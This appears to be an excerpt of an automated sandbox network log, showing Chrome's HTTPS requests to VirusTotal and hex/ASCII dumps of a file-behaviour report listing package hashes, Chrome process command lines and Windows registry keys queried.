                                                                                                                                                                                                                    2024-04-25 19:56:15 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 70 61 74 68 22 3a 20 22 41 70 70 78 4d 65 74 61 64 61 74 61 2f 43 6f 64 65 49 6e 74 65 67 72 69 74 79 2e 63 61 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 68 61 32 35 36 22 3a 20 22 62 33 65 37 61 66 63 30 63 36 38 63 39 34 30 64 32 35 62 63 35 39 30 33 37 38 34 61 64 63 37 35 39 31 61 64 30 33 64 64 62 32 30 36 66 34 31 37 36 62 64 35 38 39 62 62 36 38 38 37 62 65 66 63 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20
                                                                                                                                                                                                                    Data Ascii: }, { "path": "AppxMetadata/CodeIntegrity.cat", "sha256": "b3e7afc0c68c940d25bc5903784adc7591ad03ddb206f4176bd589bb6887befc" }, {
                                                                                                                                                                                                                    2024-04-25 19:56:15 UTC1280INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 70 61 74 68 22 3a 20 22 41 70 70 78 53 69 67 6e 61 74 75 72 65 2e 70 37 78 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 68 61 32 35 36 22 3a 20 22 30 37 33 61 38 37 36 38 32 39 65 35 33 35 39 61 32 32 34 63 61 64 31 35 35 37 63 31 61 64 38 66 61 38 61 31 31 33 36 61 32 38 35 36 37 64 38 33 66 61 62 32 34 31 62 36 66 65 30 34 63 32 35 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: }, { "path": "AppxSignature.p7x", "sha256": "073a876829e5359a224cad1557c1ad8fa8a1136a28567d83fab241b6fe04c25d" }, {
                                                                                                                                                                                                                    2024-04-25 19:56:15 UTC1408INData Raw: 30 30 30 30 66 65 39 39 62 64 39 38 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 54 45 58 54 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6a 61 33 5f 64 69 67 65 73 74 73 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 33 62 35 30 37 34 62 31 62 35 64 30 33 32 65 35 36 32 30 66 36 39 66 39 66 37 30 30 66 66 30 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 33 64 64 32 32 33 66 35 35 37 33 36 37 34 30 62 32 39 62 35 62 33 61 62 63 30 32 31 35 33 35 66 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: 0000fe99bd98", "type": "TEXT" } ], "ja3_digests": [ "3b5074b1b5d032e5620f69f9f700ff0e", "3dd223f55736740b29b5b3abc021535f",
                                                                                                                                                                                                                    2024-04-25 19:56:15 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 5c 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 5c 5c 47 6f 6f 67 6c 65 5c 5c 43 68 72 6f 6d 65 5c 5c 41 70 70 6c 69 63 61 74 69 6f 6e 5c 5c 63 68 72 6f 6d 65 2e 65 78 65 5c 22 20 2d 2d 73 69 6e 67 6c 65 2d 61 72 67 75 6d 65 6e 74 20 68 74 74 70 73 3a 2f 2f 61 73 61 6e 61 2e 63 6f 6d 2f 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 68 69 6c 64 72 65 6e 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 70 72 6f
                                                                                                                                                                                                                    Data Ascii: "name": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --single-argument https://asana.com/", "children": [ { "pro
                                                                                                                                                                                                                    2024-04-25 19:56:15 UTC1280INData Raw: 34 36 2e 31 38 33 30 30 30 20 2f 70 72 65 66 65 74 63 68 3a 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 70 72 6f 63 65 73 73 5f 69 64 22 3a 20 22 35 36 37 36 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 5c 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 5c 5c 47 6f 6f 67 6c 65 5c 5c 43 68 72 6f 6d 65 5c 5c 41 70 70 6c 69 63 61
                                                                                                                                                                                                                    Data Ascii: 46.183000 /prefetch:3" }, { "process_id": "5676", "name": "\"C:\\Program Files\\Google\\Chrome\\Applica
                                                                                                                                                                                                                    2024-04-25 19:56:15 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 5c 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 5c 5c 47 6f 6f 67 6c 65 5c 5c 43 68 72 6f 6d 65 5c 5c 41 70 70 6c 69 63 61 74 69 6f 6e 5c 5c 63 68 72 6f 6d 65 2e 65 78 65 5c 22 20 2d 2d 74 79 70 65 3d 75 74 69 6c 69 74 79 20 2d 2d 75 74 69 6c 69 74 79 2d 73 75 62 2d 74 79 70 65 3d 71 75 61 72 61 6e 74 69 6e 65 2e 6d 6f 6a 6f 6d 2e 51 75 61 72 61 6e 74 69 6e 65 20 2d 2d 6c 61 6e 67 3d 65 6e 2d 55 53 20 2d 2d 73 65 72 76 69 63 65 2d 73 61 6e 64 62 6f 78 2d 74 79 70 65 3d 6e 6f 6e 65 20 2d 2d 6e 6f 2d 61 70 70 63 6f 6d 70 61 74 2d 63 6c 65 61 72 20 2d 2d 6d 6f 6a 6f 2d 70 6c 61 74 66 6f 72 6d 2d 63 68 61 6e 6e 65 6c 2d 68 61 6e 64 6c 65 3d 35 33 30 38 20 2d 2d 66 69
                                                                                                                                                                                                                    Data Ascii: "name": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5308 --fi


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    245192.168.2.165000474.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:56:15 UTC570OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:56:16 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 294dd2a527bfe8efc1c193bc41d5b1fc
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:56:16 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:56:16 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    246192.168.2.165000574.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:56:19 UTC955OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTQ5NDQ1MzY5OTEtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTc4LjQ0OA==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:56:20 UTC886INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: a8132785aa2171633088e3541897cada
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:56:20 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 159972
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:56:20 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:56:20 UTC522INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38 36 32 39 39 33 35 38 5f 43 41 50 45 20 53 61 6e 64 62 6f 78 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 66 69 6c 65 5f 62 65 68 61 76 69 6f 75 72 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 66 69 6c 65 5f 62 65 68 61 76 69 6f 75 72
                                                                                                                                                                                                                    Data Ascii: { "data": [ { "id": "76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358_CAPE Sandbox", "type": "file_behaviour", "links": { "self": "https://www.virustotal.com/ui/file_behaviour
                                                                                                                                                                                                                    2024-04-25 19:56:20 UTC1408INData Raw: 72 6f 67 72 61 6d 20 46 69 6c 65 73 5c 5c 63 68 72 6f 6d 65 5f 42 49 54 53 5f 35 32 36 34 5f 32 31 33 33 35 39 35 31 35 32 5c 5c 42 49 54 37 45 43 32 2e 74 6d 70 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 5c 5c 63 68 72 6f 6d 65 5f 42 49 54 53 5f 35 32 36 34 5f 32 30 37 39 30 34 33 38 35 35 5c 5c 42 49 54 41 31 44 43 2e 74 6d 70 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 68 61 73 5f 68 74 6d 6c 5f 72 65 70 6f 72 74 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 68 61 73 5f 70 63 61 70 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 72 76 69
                                                                                                                                                                                                                    Data Ascii: rogram Files\\chrome_BITS_5264_2133595152\\BIT7EC2.tmp", "C:\\Program Files\\chrome_BITS_5264_2079043855\\BITA1DC.tmp" ], "has_html_report": true, "has_pcap": true, "servi
                                                                                                                                                                                                                    2024-04-25 19:56:20 UTC545INData Raw: 54 57 41 52 45 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 5c 50 6f 6c 69 63 69 65 73 5c 5c 45 78 70 6c 6f 72 65 72 5c 5c 50 72 65 76 65 6e 74 49 74 65 6d 43 72 65 61 74 69 6f 6e 49 6e 55 73 65 72 73 46 69 6c 65 73 46 6f 6c 64 65 72 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 4c 4f 43 41 4c 5f 4d 41 43 48 49 4e 45 5c 5c 53 4f 46 54 57 41 52 45 5c 5c 43 6c 61 73 73 65 73 5c 5c 43 4c 53 49 44 5c 5c 7b 44 46 46 41 43 44 43 35 2d 36 37 39 46 2d 34 31 35 36 2d 38 39 34 37 2d 43 35 43 37 36 42 43 30 42 36 37 46 7d 5c 5c 49 6e 73 74 61 6e 63 65 5c 5c 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 43 55 52 52 45 4e
                                                                                                                                                                                                                    Data Ascii: TWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\PreventItemCreationInUsersFilesFolder", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\Instance\\", "HKEY_CURREN
                                                                                                                                                                                                                    2024-04-25 19:56:20 UTC1408INData Raw: 6e 74 56 65 72 73 69 6f 6e 5c 5c 45 78 70 6c 6f 72 65 72 5c 5c 46 6f 6c 64 65 72 44 65 73 63 72 69 70 74 69 6f 6e 73 5c 5c 7b 41 45 35 30 43 30 38 31 2d 45 42 44 32 2d 34 33 38 41 2d 38 36 35 35 2d 38 41 30 39 32 45 33 34 39 38 37 41 7d 5c 5c 52 6f 61 6d 61 62 6c 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 4c 4f 43 41 4c 5f 4d 41 43 48 49 4e 45 5c 5c 53 4f 46 54 57 41 52 45 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 5c 50 6f 6c 69 63 69 65 73 5c 5c 45 78 70 6c 6f 72 65 72 5c 5c 4e 6f 49 6e 74 65 72 6e 65 74 49 63 6f 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 4c 4f 43 41 4c 5f 4d 41 43 48 49 4e 45
                                                                                                                                                                                                                    Data Ascii: ntVersion\\Explorer\\FolderDescriptions\\{AE50C081-EBD2-438A-8655-8A092E34987A}\\Roamable", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoInternetIcon", "HKEY_LOCAL_MACHINE
                                                                                                                                                                                                                    2024-04-25 19:56:20 UTC1408INData Raw: 34 37 2d 33 66 37 32 2d 34 34 61 37 2d 38 39 63 35 2d 35 35 39 35 66 65 36 62 33 30 65 65 7d 5c 5c 53 68 65 6c 6c 46 6f 6c 64 65 72 5c 5c 46 6f 6c 64 65 72 56 61 6c 75 65 46 6c 61 67 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 4c 4f 43 41 4c 5f 4d 41 43 48 49 4e 45 5c 5c 53 4f 46 54 57 41 52 45 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 5c 45 78 70 6c 6f 72 65 72 5c 5c 46 6f 6c 64 65 72 44 65 73 63 72 69 70 74 69 6f 6e 73 5c 5c 7b 41 45 35 30 43 30 38 31 2d 45 42 44 32 2d 34 33 38 41 2d 38 36 35 35 2d 38 41 30 39 32 45 33 34 39 38 37 41 7d 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 4c 4f 43 41 4c 5f
                                                                                                                                                                                                                    Data Ascii: 47-3f72-44a7-89c5-5595fe6b30ee}\\ShellFolder\\FolderValueFlags", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{AE50C081-EBD2-438A-8655-8A092E34987A}", "HKEY_LOCAL_
                                                                                                                                                                                                                    2024-04-25 19:56:20 UTC1280INData Raw: 70 74 69 6f 6e 73 5c 5c 7b 35 45 36 43 38 35 38 46 2d 30 45 32 32 2d 34 37 36 30 2d 39 41 46 45 2d 45 41 33 33 31 37 42 36 37 31 37 33 7d 5c 5c 50 61 72 65 6e 74 46 6f 6c 64 65 72 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 43 55 52 52 45 4e 54 5f 55 53 45 52 5c 5c 53 4f 46 54 57 41 52 45 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 5c 45 78 70 6c 6f 72 65 72 5c 5c 53 65 73 73 69 6f 6e 49 6e 66 6f 5c 5c 31 5c 5c 4b 6e 6f 77 6e 46 6f 6c 64 65 72 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 4c 4f 43 41 4c 5f 4d 41 43 48 49 4e 45 5c 5c 53 4f 46 54 57 41 52 45 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e
                                                                                                                                                                                                                    Data Ascii: ptions\\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\\ParentFolder", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\KnownFolders", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Win
                                                                                                                                                                                                                    2024-04-25 19:56:20 UTC1408INData Raw: 5c 5c 45 78 70 6c 6f 72 65 72 5c 5c 46 6f 6c 64 65 72 44 65 73 63 72 69 70 74 69 6f 6e 73 5c 5c 7b 41 45 35 30 43 30 38 31 2d 45 42 44 32 2d 34 33 38 41 2d 38 36 35 35 2d 38 41 30 39 32 45 33 34 39 38 37 41 7d 5c 5c 50 72 6f 70 65 72 74 79 42 61 67 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 43 55 52 52 45 4e 54 5f 55 53 45 52 5c 5c 43 6f 6e 74 72 6f 6c 20 50 61 6e 65 6c 5c 5c 49 6e 74 65 72 6e 61 74 69 6f 6e 61 6c 5c 5c 47 65 6f 5c 5c 4e 61 74 69 6f 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 43 55 52 52 45 4e 54 5f 55 53 45 52 5c 5c 53 6f 66 74 77 61 72 65 5c 5c 43 6c 61 73 73 65 73 5c 5c 43 4c 53 49 44 5c 5c 7b 44 46 46 41 43 44 43 35 2d 36 37 39 46 2d 34 31 35 36
                                                                                                                                                                                                                    Data Ascii: \\Explorer\\FolderDescriptions\\{AE50C081-EBD2-438A-8655-8A092E34987A}\\PropertyBag", "HKEY_CURRENT_USER\\Control Panel\\International\\Geo\\Nation", "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{DFFACDC5-679F-4156
                                                                                                                                                                                                                    2024-04-25 19:56:20 UTC1408INData Raw: 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 43 55 52 52 45 4e 54 5f 55 53 45 52 5c 5c 53 4f 46 54 57 41 52 45 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 5c 50 6f 6c 69 63 69 65 73 5c 5c 45 78 70 6c 6f 72 65 72 5c 5c 4e 6f 72 6d 61 6c 69 7a 65 4c 69 6e 6b 4e 65 74 50 69 64 6c 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 4c 4f 43 41 4c 5f 4d 41 43 48 49 4e 45 5c 5c 53 4f 46 54 57 41 52 45 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 5c 45 78 70 6c 6f 72 65 72 5c 5c 46 6f 6c 64 65 72 44 65 73 63 72 69 70 74 69 6f 6e 73 5c 5c 7b 35 45 36 43
                                                                                                                                                                                                                    Data Ascii: ", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NormalizeLinkNetPidls", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{5E6C
                                                                                                                                                                                                                    2024-04-25 19:56:20 UTC1280INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 4c 4f 43 41 4c 5f 4d 41 43 48 49 4e 45 5c 5c 53 4f 46 54 57 41 52 45 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 5c 45 78 70 6c 6f 72 65 72 5c 5c 46 6f 6c 64 65 72 44 65 73 63 72 69 70 74 69 6f 6e 73 5c 5c 7b 41 45 35 30 43 30 38 31 2d 45 42 44 32 2d 34 33 38 41 2d 38 36 35 35 2d 38 41 30 39 32 45 33 34 39 38 37 41 7d 5c 5c 50 75 62 6c 69 73 68 45 78 70 61 6e 64 65 64 50 61 74 68 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 4c 4f 43 41 4c 5f 4d 41 43 48 49 4e 45 5c 5c 53 4f 46 54 57 41 52 45 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 43 75 72 72 65 6e 74 56 65 72 73
                                                                                                                                                                                                                    Data Ascii: "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{AE50C081-EBD2-438A-8655-8A092E34987A}\\PublishExpandedPath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVers
                                                                                                                                                                                                                    2024-04-25 19:56:20 UTC1408INData Raw: 33 66 37 32 2d 34 34 61 37 2d 38 39 63 35 2d 35 35 39 35 66 65 36 62 33 30 65 65 7d 5c 5c 53 68 65 6c 6c 46 6f 6c 64 65 72 5c 5c 52 65 73 74 72 69 63 74 65 64 41 74 74 72 69 62 75 74 65 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 4c 4f 43 41 4c 5f 4d 41 43 48 49 4e 45 5c 5c 53 4f 46 54 57 41 52 45 5c 5c 43 6c 61 73 73 65 73 5c 5c 43 4c 53 49 44 5c 5c 7b 44 46 46 41 43 44 43 35 2d 36 37 39 46 2d 34 31 35 36 2d 38 39 34 37 2d 43 35 43 37 36 42 43 30 42 36 37 46 7d 5c 5c 49 6e 73 74 61 6e 63 65 5c 5c 49 6e 69 74 50 72 6f 70 65 72 74 79 42 61 67 5c 5c 41 74 74 72 69 62 75 74 65 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 4c 4f 43 41 4c 5f 4d 41 43 48 49 4e 45 5c 5c 53
